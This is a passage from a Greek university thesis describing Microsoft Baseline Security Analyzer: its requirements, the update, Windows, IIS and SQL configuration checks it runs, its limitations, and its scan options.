διαθέσιμο μέσω της ιστοσελίδας http://technet.microsoft.com/en-us/security/cc184923.aspx.

Το MBSA βοηθά στον προσδιορισμό της κατάστασης ασφάλειας της επιχείρησης σύμφωνα

με τις συστάσεις ασφάλειας της Microsoft, ενώ ταυτόχρονα παρέχει συγκεκριμένες οδηγίες

για την επιδιόρθωση των ευπαθειών που εντοπίζει. Βοηθά στην ανίχνευση κοινών λαθών

στη διαμόρφωση (misconfigurations) ασφάλειας των εφαρμογών και εντοπίζει κρίσιμες

ενημερώσεις (updates) ασφάλειας που απουσιάζουν από το πληροφοριακό σύστημα56

.

Η ανάπτυξή του στηρίχτηκε στην υποδομή των Windows Update Agent και Microsoft

Update με αποτέλεσμα να εξασφαλίζεται η συνέπεια και η συνεργασία του με άλλα

προϊόντα της Microsoft όπως Microsoft Update (MU), Windows Server Update Services

(WSUS), Systems Management Server (SMS), System Center Configuration Manager

(SCCM) 2007, και Small Business Server (SBS).

Το MBSA διατίθεται δωρεάν στους χρήστες αυθεντικού λογισμικού της Microsoft.

Υποστηρίζει τις πλατφόρμες x64 και x86 και μπορεί να χρησιμοποιηθεί για τον εντοπισμό

λαθών διαμόρφωσης σε57

• Windows 2000

:

• Windows XP

• Windows Vista

• Windows Server 2003

• Windows Server 2008

• Microsoft Internet Information Services (IIS) 5.0, 5.1, και 6.0

• Microsoft Internet Explorer 5.01, 5.5, και 6.0 (συμπεριλαμβανομένου του Internet

Explorer 6.0 για Windows XP SP2 και Internet Explorer 6.0 για Windows Server 2003)

• Microsoft SQL Server 7.0, SQL Server 2000 και SQL Server 2005

• Microsoft Office 2000, Office XP, και Office 2003

56 http://technet.microsoft.com/en-us/security/cc184923.aspx 57 http://technet.microsoft.com/en-us/security/cc184922.aspx

Page 99: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

99 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ενώ διενεργεί έλεγχο για ενημερώσεις (updates) ασφάλειας που απουσιάζουν στα παρακάτω

συστήματα:

• Microsoft Exchange Server 2003

• Exchange Server 2000

• Internet Security and Acceleration (ISA) Server 2004

• Microsoft Office 2003

• Office 2002/XP

• Small Business Server 2003

• Small Business Server 2000 SP1

• SQL Server 2005

• SQL Server 2000 SP4

• System Center Data Protection Manager (DPM) 2006

• Windows Server 2003 Datacenter Edition

• Windows Server 2003 Enterprise Edition

• Windows Server 2003 Standard Edition

• Windows Server 2003 Web Edition

• Windows Defender

• Windows 2000

Το MBSA μπορεί να χρησιμοποιηθεί είτε για τον έλεγχο ενός μεμονωμένου υπολογιστή,

είτε για τον έλεγχο ενός απομακρυσμένου υπολογιστή με χρήση της διεύθυνσης ΙΡ του, είτε

για υπολογιστές που βρίσκονται στο ίδιο Domain. Οι έλεγχοι ευπαθειών μπορούν να

διεξαχθούν τόσο μέσα από το γραφικό περιβάλλον του MBSA ό σο και από την γραμμή

εντολών (command line), ενώ μετά την ολοκλήρωσή τους παράγεται μια αναφορά με τις

ευπάθειες που εντοπίστηκαν ή τις ενημερώσεις που λείπουν. Οι αναφορές οι οποίες

παράγονται από τον έλεγχο αποθηκεύονται στον υπολογιστή που είναι εγκατεστημένο το

MBSA, στον προεπιλεγμένο φάκελο SecurityScan του user’s profile, με επέκταση αρχείου

.MBSA. Το εργαλείο παράγει ξεχωριστή αναφορά για κάθε υπολογιστή που ελέγχεται

τοπικά ή απομακρυσμένα.

Οι απαιτήσεις συστήματος για την εκτέλεση του εργαλείου MBSA παρουσιάζονται στον

επόμενο πίνακα.

Page 100: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

100 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ο υπολογιστής πρέπει να έχει

Απαιτήσεις συστήματος για την εκτέλεση του MBSA με σκοπό τη

σάρωση (Scan)

Απαιτήσεις υπολογιστή για τη

διενέργεια απομακρυσμένης

σάρωσης σε αυτόν Υπολογιστών

τοπικά Απομακρυσμένων

υπολογιστών Microsoft Windows Server™ 2008 R2, Windows 7, Microsoft Windows Server™ 2008, Windows Vista, Windows Server™ 2003, Windows XP, ή Windows 2000 Service Pack 3 ή μεταγενέστερο.

√ √ √

Internet Explorer 5.01 ή μεταγενέστερο √ √ √

MSXML 3.0 SP2 √ √ Υπηρεσίες World Wide Web για τη διενέργεια ελέγχων ευπαθειών IIS (Internet Information Services)

IIS 6.0 Common Files √ IIS 5.0, 6.0 √ Microsoft SQL Server 7.0 ή 2000 ή Microsoft Data Engine ή Microsoft SQL Server 2000 Desktop Engine (MSDE)

Windows Update Agent 3.0 √ √ √ Microsoft Office 2000, Office XP or Office System 2003

Windows Installer 3.0 ή μεταγενέστερο

Ενεργοποιημένα: • Workstation service • Server service • Client for Microsoft Networks • Remote Registry service • File and Print Sharing

√ √

√ √

√ √ √

Distributed COM (DCOM) √ Πίνακας 4-1: Απαιτήσεις συστήματος για την εκτέλεση ελέγχων με το εργαλείο MBSA

4.3.2 Δυνατότητες Το MBSA μπορεί να διεξάγει τους παρακάτω ελέγχους για τα προϊόντα που είναι

εγκατεστημένα στον υπολογιστή στον οποίο πραγματοποιείται η σάρωση:

• Ενημερώσεις Ασφάλειας (security update checks): Ελέγχεται ποιες από τις διαθέσιμες

ενημερώσεις δεν είναι εγκατεστημένες στον υπολογιστή που ελέγχεται. Οι έλεγχοι

αφορούν σε security updates, update rollups και service packs, ενώ εκτελούνται με τη

Page 101: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

101 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

χρησιμοποίηση των πληροφοριών που λαμβάνονται άμεσα από το Microsoft update site

(online), από έναν Windows Server Update Services (WSUS) εξυπηρετητή ή από ένα

κατάλογο CAB όταν οι έλεγχοι διενεργούνται offline ή σε ασφαλές περιβάλλον.

Συγκεκριμένα ελέγχονται οι διαθέσιμες ενημερώσεις για τα παρακάτω:

Microsoft® Windows 2000, Windows XP, Windows Server 2003, Windows Vista,

Windows Server 2008

Internet Information Server (IIS) 5.0, 5.1 και IIS 6.0

SQL Server™ 2000 και 2005 (συμπεριλαμβανομένου και του Microsoft Data

Engine)

Internet Explorer 5.01 και μεταγενέστερων

Windows Media Player 6.4 και μεταγενέστερων

Exchange Server 2000, 2003 και 2005 (συμπεριλαμβανομένου των Exchange

administrative tools)

Microsoft Data Access Components (MDAC) – όλες οι υποστηριζόμενες εκδόσεις

Microsoft Virtual Machine (VM)

MSXML - όλες οι υποστηριζόμενες εκδόσεις

Microsoft Office XP (2002), Office System 2003 και Office 2007

.Net Framework 1.0, 1.1, 2.0 και μεταγενέστερων

Microsoft DirectX

• Έλεγχοι των Windows: Αυτή η ομάδα ελέγχων ανιχνεύει θέματα ασφάλειας τα οποία

σχετίζονται με το λειτουργικό σύστημα των Windows. Συγκεκριμένα:

Λήξη συνθηματικών σε λογαριασμούς χρηστών (account password expiration): Προσδιορίζεται αν υπάρχουν τοπικά λογαριασμοί χρηστών των οποίων τα

συνθηματικά δεν λήγουν.

Τύποι αρχείων συστήματος (file system type): Προσδιορίζεται ο τύπος αρχείων

συστήματος σε κάθε σκληρό δίσκο με σκοπό να επιβεβαιωθεί ότι χρησιμοποιείται το

σύστημα NTFS, το οποίο θεωρείται ασφαλές δεδομένου ότι επιτρέπει τον έλεγχο ή

τον περιορισμό προσπέλασης των χρηστών σε αρχεία και καταλόγους. Για να είναι

επιτυχημένο ς αυτό ς ο έλεγχο ς θα πρέπει η κο ινή χρήση του δίσκου να γίνει

χρησιμοποιώντας δικαιώματα διαχειριστή του συστήματος.

Ενεργοποίηση αυτόματης εισόδου (Auto Logon feature): Προσδιορίζεται εάν είναι

ενεργοποιημένο το χαρακτηριστικό αυτόματης εισόδου στο σύστημα και εάν το

συνθηματικό εισόδου είναι κρυπτογραφημένο στο μητρώο των windows (registry) ή

αποθηκευμένο ως απλό κείμενο (plaintext). Εάν η αυτόματη είσοδος είναι

ενεργοποιημένη και το συνθηματικό εισόδου είναι αποθηκευμένο ως απλό κείμενο

Page 102: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

102 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

στην αναφορά επισημαίνεται ως υψηλού επιπέδου ευπάθεια, ενώ αν η αυτόματη

είσοδος είναι ενεργοποιημένη και το συνθηματικό εισόδου είναι κρυπτογραφημένο

στο μητρώο των Windows στην αναφορά επισημαίνεται ως πιθανή ευπάθεια.

Ενεργοποίηση Λογαριασμού Guest (Guest account): Προσδιορίζεται αν ο λογαριασμός

χρήστη Guest είναι ενεργοποιημένος. Εάν ο λογαριασμός χρήστη Guest είναι

ενεργοποιημένος σε ένα υπολογιστή οποίος χρησιμοποιεί Windows NT, Windows

2000, Windows Server 2003, Windows Server 2008, Windows Vista ή Windows ΧΡ

στην αναφορά επισημαίνεται ως ευπάθεια. Εάν ο υπολογιστής έχει Windows ΧΡ τα

οποία χρησιμοποιούν την απλή κοινή χρήση αρχείων (simple file sharing) στην

αναφορά δεν επισημαίνεται ως ευπάθεια.

Ρυθμίσεις του κλειδιού RestrictAnonymous του μητρώου (RestrictAnonymous registry

key settings): Προσδιορίζεται εάν οι ρυθμίσεις του κλειδιού RestrictAnonymous του

μητρώου περιορίζουν τις ανώνυμες συνδέσεις.

Αριθμός τοπικών λογαριασμών διαχειριστών (number of local Administrator

accounts): Προσδιορίζονται και απαριθμούνται οι μεμονωμένοι λογαριασμοί χρηστών

που ανήκουν στην ομάδα των τοπικών διαχειριστών. Εάν εντοπιστούν περισσότεροι

από δυο λογαριασμοί διαχειριστών το MBSA θα τους επισημάνει στην αναφορά του

ως πιθανή ευπάθεια. Γενικά συστήνεται ο περιορισμός των λογαριασμών

διαχειριστών στο ελάχιστο, δεδομένου ότι ένας χρήστης με δικαιώματα διαχειριστή

έχει τον πλήρη έλεγχο του συστήματος.

Κενά ή εύκολα συνθηματικά για τους τοπικούς λογαριασμούς χρηστών (blank or simple

local user account passwords): Προσδιορίζεται η ύπαρξη κενών ή εύκολα εικάσιμων

συνθηματικών στους τοπικούς λογαριασμούς χρηστών. Τα λειτουργικά συστήματα

Microsoft Windows Server 2008, Microsoft Windows Server 2003, Windows Vista,

Windows XP και Windows 2000 απαιτούν την αυθεντικοποίηση των χρηστών μέσω

συνθηματικών, ενώ οι χρήστες μπορούν να επιλέξουν το συνθηματικό τους. Η

ασφάλεια του λογαριασμού τους εξαρτάται από αυτή την επιλογή. Μέσω αυτού του

ελέγχου απαριθμούνται όλοι οι λογαριασμοί των χρηστών και ελέγχεται η κατάσταση

των συνθηματικών ως προς τα ακόλουθα:

Το συνθηματικό είναι κενό

Το συνθηματικό είναι το ίδιο με το όνομα του λογαριασμού χρήστη

Το συνθηματικό είναι το ίδιο με το όνομα του υπολογιστή

Το συνθηματικό χρησιμοποιεί τη λέξη password

Το συνθηματικό χρησιμοποιεί τη λέξη “admin” ή “administrator”

Επίσης, ο έλεγχος ενημερώνει για την ύπαρξη οποιουδήποτε λογαριασμού χρήστη ο

οποίος είναι απενεργοποιημένος ή κλειδωμένος. Το MBSA δεν προσπαθεί να

Page 103: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

103 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ανακτήσει τα συνθηματικά απλά να προσδιορίζει την ευπάθειά τους και προτείνει την

αλλαγή τους όπου χρειάζεται.

Περιττές Υπηρεσίες οι οποίες είναι ενεργές (unnecessary services are running):

Προσδιορίζεται αν κάποια από τις υπηρεσίες η οποία περιέχεται στο αρχείο

Services.txt είναι εγκατεστημένη στον υπολογιστή που ελέγχεται και ποια είναι η

κατάστασή της (ενεργοποιημένη ή απενεργοποιημένη). Το αρχείο Services.txt

περιέχει μια λίστα υπηρεσιών οι οποίες πρέπει να ελεγχθούν στο υπολογιστή που

διενεργείται ο έλεγχος, ενώ είναι δυνατή η διαμόρφωσή του, δηλαδή η προσθήκη ή η

αφαίρεση υπηρεσιών από τη λίστα. Η υπηρεσίες που περιλαμβάνονται στο αρχείο

Services.txt με την εγκατάσταση του MBSA είναι οι:

MSFTPSVC (FTP)

TlntSvr (Telnet)

W3SVC (WWW)

SMTPSVC (SMTP)

Κοινή χρήση αρχείων (List the shares present on the computer): Καθορίζεται αν

υπάρχουν κοινά αρχεία στον υπολογιστή που ελέγχεται. Στην αναφορά που παράγεται

απαριθμούνται όλα τα κοινά αρχεία τα οποία εντοπίζονται συμπεριλαμβανομένων των

διαχειριστικών κοινών αρχείων μαζί με το επίπεδο κοινής χρήσης (share-level) και τις

άδειες του NTFS επιπέδου.

Ενεργοποίηση ελέγχων των Windows (Windows auditing is enabled): Προσδιορίζεται

αν είναι ενεργοποιημένοι οι έλεγχοι των Windows. Τα Windows διαθέτουν τη

δυνατότητα ελέγχου και καταγραφής κάποιων γεγονότων τα οποία συμβαίνουν στον

υπολογιστή όπως οι επιτυχημένες ή αποτυχημένες προσπάθειες σύνδεσης στο

σύστημα. Με την ενεργοποίηση αυτών των ελέγχων μπορούν να εντοπιστούν

γεγονότα τα οποία σχετίζονται με την ασφάλεια του συστήματος καθώς και

κακόβουλες δραστηριότητες.

Έκδοση των Windows (Windows version): Προσδιορίζεται ποιο λειτουργικό σύστημα

και ποια έκδοση service pack εκτελείται στον υπολογιστή που ελέγχεται. Για τη

διατήρηση της ασφάλειας θα πρέπει να είναι εγκατεστημένη στον υπολογιστή η

τελευταία έκδοση service pack του λειτουργικού συστήματος των Windows που

χρησιμοποιείται.

Ενεργοποίηση Αναχώματος Ασφάλειας (Internet Connection Firewall is enabled):

Προσδιορίζεται αν είναι ενεργοποιημένο το Ανάχωμα Ασφάλειας των Windows για

όλες τις ενεργές συνδέσεις δικτύου και αν υπάρχουν ανοιχτές στατικές θύρες εισόδου

σε αυτό. Το MBSA δεν ανιχνεύει άλλα Αναχώματα Ασφάλειας (λογισμικού ή υλικού)

τα οποία ενδεχομένως είναι εγκατεστημένα στον υπολογιστή που ελέγχεται.

Page 104: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

104 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Ενεργοποίηση αυτόματων ενημερώσεων (Automatic Updates is enabled):

Προσδιορίζεται εάν είναι ενεργοποιημένες οι αυτόματες ενημερώσεις στον

υπολογιστή που ελέγχεται και πως έχουν διαμορφωθεί.

Μη ολοκληρωμένη εγκατάσταση ενημερώσεων (incomplete updates): Προσδιορίζεται

εάν στο σύστημα έχουν εγκατασταθεί ενημερώσεις οι οποίες απαιτούν την

επανεκκίνηση του υπολογιστή για να τεθούν σε λειτουργία. Εάν εντοπιστεί ότι αυτό

συμβαίνει τότε στην αναφορά επισημαίνεται σαν πιθανή ευπάθεια, δεδομένου ότι δεν

παρέχεται στον υπολογιστή η απαιτούμενη προστασία μέχρι την επανεκκίνησή του.

• Έλεγχοι IIS (Internet Information Service): Αυτή η ομάδα ελέγχων ανιχνεύει θέματα

ασφάλειας τα οποία σχετίζονται με το εργαλείο IIS 5.0, 5,1 και 6.0. Στην αναφορά που

παράγεται από το MBSA με την ολοκλήρωση των ελέγχων, περιγράφεται αναλυτικά

κάθε έλεγχος IIS που διενεργήθηκε, ενώ παρέχονται οδηγίες για την αντιμετώπιση των

προβλημάτων ασφάλειας που εντοπίστηκαν. Διενεργούνται οι ακόλουθοι έλεγχοι58

Λειτουργία του εργαλείου IIS Lockdown (version 2.1)

:

Έλεγχος εάν είναι εγκατεστημένες οι sample εφαρμογές του IIS

Ενεργοποίηση του IIS parent paths

Έλεγχος εάν είναι εγκατεστημένο το Admin virtual folder του IIS

Έλεγχος εάν είναι εγκατεστημένοι οι εικονικοί κατάλογοι MSADC και Scripts

Ενεργοποίηση IIS logging

Έλεγχος εάν ο IIS εκτελείται σε έναν domain controller

• Έλεγχοι SQL: Οι έλεγχοι αυτής της ομάδας σχετίζονται με ευπάθειες του SQL Server

και του Microsoft Data Engine (MSDE). Όλοι οι μεμονωμένοι έλεγχοι διενεργούνται σε

κάθε στιγμιότυπο του SQL Server και του MSDE. Στην αναφορά που παράγεται, μετά

τον έλεγχο, περιγράφεται ο κάθε έλεγχος που πραγματοποιήθηκε και παρέχονται οδηγίες

για την διόρθωση των ευπαθειών που εντοπίστηκαν. Το MBSA εκτελεί τους παρακάτω

ελέγχους:

Έλεγχος εάν η ομάδα διαχειριστών ανήκει στο Sysadmin role

Έλεγχος εάν ο CmdExec role είναι περιορισμένος στο Sysadmin μόνο

Έλεγχος εάν ο SQL Server εκτελείται σε έναν domain controller

Έλεγχος εάν το συνθηματικό του λογαριασμού του διαχειριστή συστήματος (sa) είναι

εκτεθειμένο

Έλεγχος αδειών πρόσβασης στους φακέλους εγκατάστασης του SQL Server

58 Για περισσότερες πληροφορίες ο αναγνώστης παραπέμπεται στο εγχειρίδιο χρήσης του εργαλείου

Page 105: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

105 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Έλεγχος εάν ο λογαριασμός Guest έχει πρόσβαση στη βάση δεδομένων

Έλεγχος εάν η ομάδα Everyone έχει πρόσβαση στα κλειδιά μητρώου (registry keys) του

SQL Server

Ελέγχεται αν οι λογαριασμοί της υπηρεσίας SQL server είναι μέλη των τοπικών

διαχειριστών

Έλεγχος αν οι λογαριασμοί SQL Server έχουν κενά ή εύκολα συνθηματικά

Έλεγχος του τύπου αυθεντικοποίησης του SQL Server

Έλεγχος του αριθμού μελών του Sysadmin role

Έλεγχος ύπαρξης πολιτικών συνθηματικού στον SQL Server

Έλεγχος υπηρεσιών Integration του SQL Server

• Έλεγχοι εφαρμογών επιφάνειας εργασίας (Desktop Application checks): Το MBSA

εκτελεί τους εξής ελέγχους:

Καταγραφή των ρυθμίσεων της ζώνης ασφάλειας του Internet Explorer για κάθε τοπικό

χρήστη:

Έλεγχος εάν είναι ενεργοποιημένος ο Internet Explorer Enhanced Security

Configuration για τους λογαριασμούς διαχειριστών:

Έλεγχος εάν είναι ενεργοποιημένος ο Internet Explorer Enhanced Security

Configuration για τους λογαριασμούς μη-διαχειριστών:

Καταγραφή των ρυθμίσεων ζώνης ασφάλειας των προϊόντων Office για κάθε τοπικό

χρήστη:

4.3.3 Περιορισμοί και παρενέργειες

Η σάρωση με το MBSA απαιτεί το εργαλείο να εκτελείται με ένα λογαριασμό διαχειριστή

σε όλους τους υπολογιστές που θα ελεγχθούν, είτε η σάρωση γίνεται σε έναν τοπικό

υπολογιστή είτε σε ένα domain, είτε απομακρυσμένα. Ανάλογα με τα μέτρα ασφάλειας του

δικτύου που χρησιμοποιούνται, αυτό μπορεί να εισάγει σημαντικό κίνδυνο, όμως είναι

απαραίτητο για την εκτέλεση του ελέγχου ευπαθειών. Αν ο κίνδυνος αυτός είναι αποδεκτός,

θα πρέπει να ληφθούν μέτρα για το περιορισμό του. Για παράδειγμα, καθιστώντας αυτό το

λογαριασμό μέλος της ομάδας Domain Admins απαιτείται λιγότερο διαχειριστικό κόστος,

γιατί ο λογαριασμός εκχωρεί αυτόματα τα απαιτούμενα δικαιώματα σε όλους τις εφαρμογές.

Εάν όμως, ο λογαριασμός είναι εκτεθειμένος σε κίνδυνο, ο κίνδυνος για το σύστημα είναι

σοβαρός αφού διαχέεται σε όλους τους υπολογιστές του domain. Για την αντιμετώπιση

αυτού του κινδύνου μπορεί να δημιουργηθεί ένας ειδικός λογαριασμού για το σκοπό αυτό, ο

οποίος θα ενεργοποιείται μόνο εφόσον είναι αναγκαίο για τη σάρωση των υπολογιστών του

Page 106: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

106 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

domain. Εναλλακτικά μπορεί να δημιουργηθεί λογαριασμός διαχειριστή σε κάθε υπολογιστή

που θα ελεγχθεί. Αυτό αυξάνει το διαχειριστικό κόστος, περιορίζει όμως τον κίνδυνο στον

τοπικό υπολογιστή και όχι σε όλους τους υπολογιστές του domain . Επιπλέον, για τον

περιορισμό της απειλής, μπορεί να χρησιμοποιηθεί μόνο η αυθεντικοποίηση Kerberos η

οποία είναι λιγότερο ευπαθής από την αυθεντικοποίηση LanMan. Αυτό όμως ενδέχεται να

απαιτήσει την αναβάθμιση του Active Directory.

Αν και το MBSA μπορεί να εγκατασταθεί σε Windows XP Home Edition και να εκτελέσει

μια το πική ανίχνευση, ένας υπολογιστής που τρέχει σε Windows XP Home Edition δεν

μπορεί να ανιχνευθεί από απόσταση για ευπάθειες διαχείρισης (Administrative

vulnerabilities). Τα Windows XP Professional μπορούν να ελεγχθούν απομακρυσμένα αρκεί

να είναι συνδεδεμένα σε ένα domain. Εάν δεν συνδέονται σε domain, τα Windows XP

Professional μπορούν να ελεγχθούν μέσω απομακρυσμένης πρόσβασης μόνο αν η ρύθμιση

τοπικής ασφάλειας τεθεί στο «Classic-local users authenticate as themselves» και

απενεργοποιηθεί η δυνατότητα απλού διαμοιρασμού αρχείων.

Το MBSA δεν μπορεί να ελέγξει έναν υπολογιστή απομακρυσμένα ο οποίος προστατεύεται

από Ανάχωμα Ασφάλειας (Firewall) εκτός και αν το Ανάχωμα Ασφάλειας έχει ρυθμιστεί να

ανοίγει τις θύρες επικοινωνίας του MBSA με τον υπολογιστή. Ο Windows Update Agent

υλοποιεί μια διεπαφή απομακρυσμένης σάρωσης βασιζόμενη στο DCOM. Ο λογαριασμός

που χρησιμοποιείται για τη σάρωση θα πρέπει να έχει δικαιώματα τοπικού διαχειριστή.

Επιπλέον στον υπολογιστή θα πρέπει να έχουν γίνει οι ακόλουθες ρυθμίσεις:

• Οι υπηρεσίες Server service, Remote Registry service και File and Print Sharing πρέπει

να είναι ενεργές στον απομακρυσμένο υπολογιστή

• Οι απαιτούμενες θύρες πρέπει να είναι ανοιχτές στο Firewall

• Ο Windows Update Agent πρέπει να είναι εγκατεστημένος και οι υπηρεσίες Automatic

Updates ενεργοποιημένες.

Το MBSA δεν μπορεί πάντα να επιβεβαιώσει την ύπαρξη hotfixes και έτσι στην αναφορά

προκύπτει ότι πιθανώς να λείπουν.

Η αναφορά σάρωσης ενδέχεται να υποδεικνύει ότι αυτή η ενημερωμένη έκδοση

εγκαταστάθηκε επιτυχώς ακόμα και αν αυτό δεν έχει συμβεί.

Page 107: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

107 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.3.4 Τρόπος λειτουργίας

Κατά την έναρξη εκτέλεσης του εργαλείου εμφανίζεται στο χρήστη η επόμενη οθόνη:

Εικόνα 4.1: Κεντρική οθόνη του MBSA

Από την κεντρική οθόνη ο χρήστης μπορεί να επιλέξει αν το εργαλείο θα πραγματοποιήσει

σάρωση ενός (Scan a computer) ή περισσότερων υπολογιστών (Scan multiple computers).

Εάν επιλέξει τη σάρωση ενός μόνο υπολογιστή μπορεί να ορίσει το όνομα του υπολογιστή ή

την ΙΡ διεύθυνσή του στο δίκτυο. Ως προεπιλογή ελέγχου εμφανίζεται το όνομα του τοπικού

υπολογιστή.

Εικόνα 4.2: Μενού επιλογών σάρωσης ενός υπολογιστή

Page 108: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

108 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εάν επιλέξει τη σάρωση περισσότερων υπολογιστών έχει τη δυνατότητα να προσδιορίσει το

Domain name που ανήκουν ή να ορίσει μια περιοχή διευθύνσεων ΙΡ.

Εικόνα 4.3: Μενού επιλογών σάρωσης πολλών υπολογιστών

Στη συνέχεια μπορεί να επιλέξει ποια είδη ελέγχων θα εκτελέσει το MBSA. Οι διαθέσιμες

επιλογές είναι:

• Check for Windows administrative vulnerabilities: Διενεργείται έλεγχος για τον

εντοπισμό ευπαθειών στη διαμόρφωση των Windows στον υπολογιστή που ελέγχεται. Οι

έλεγχοι μεταξύ άλλων αφορούν στον αριθμό μελών του τοπικού Administrator group,

στον τύπο αρχείων συστήματος, στην ενεργοποίηση του Αναχώματος Ασφάλειας των

Windows, στην κατάσταση του λογαριασμού Guest, στην κοινή χρήση αρχείων, κλπ.

• Check for weak passwords: Ελέγχονται τα συνθηματικά των λογαριασμών χρηστών τα

οποία χρησιμοποιούνται στον τοπικό υπολογιστή για το εάν είναι κενά ή εύκολα να

εικαστούν. Αυτός ο έλεγχος μπορεί να διαρκέσει αρκετή ώρα ανάλογα με τον αριθμό των

λογαριασμών χρηστών στον υπολογιστή. Όταν το μηχάνημα που ελέγχεται είναι ένας

domain controller, ο έλεγχος αυτός είναι απενεργοποιημένος για να μειωθεί ο αριθμός

των συνθηματικών που πρέπει να ελεγχθούν. Επίσης, μπορεί να δημιουργηθούν event-log

εγγραφές στο ημερολόγιο ασφάλειας, αν ο έλεγχος είναι ενεργοποιημένος, για

logon/logoff γεγονότα. Αν ο χρήστης επιλέξει να μην διενεργηθεί αυτός ο έλεγχος, δεν θα

πραγματοποιηθεί έλεγχων συνθηματικών για τους λογαριασμούς των Windows και του

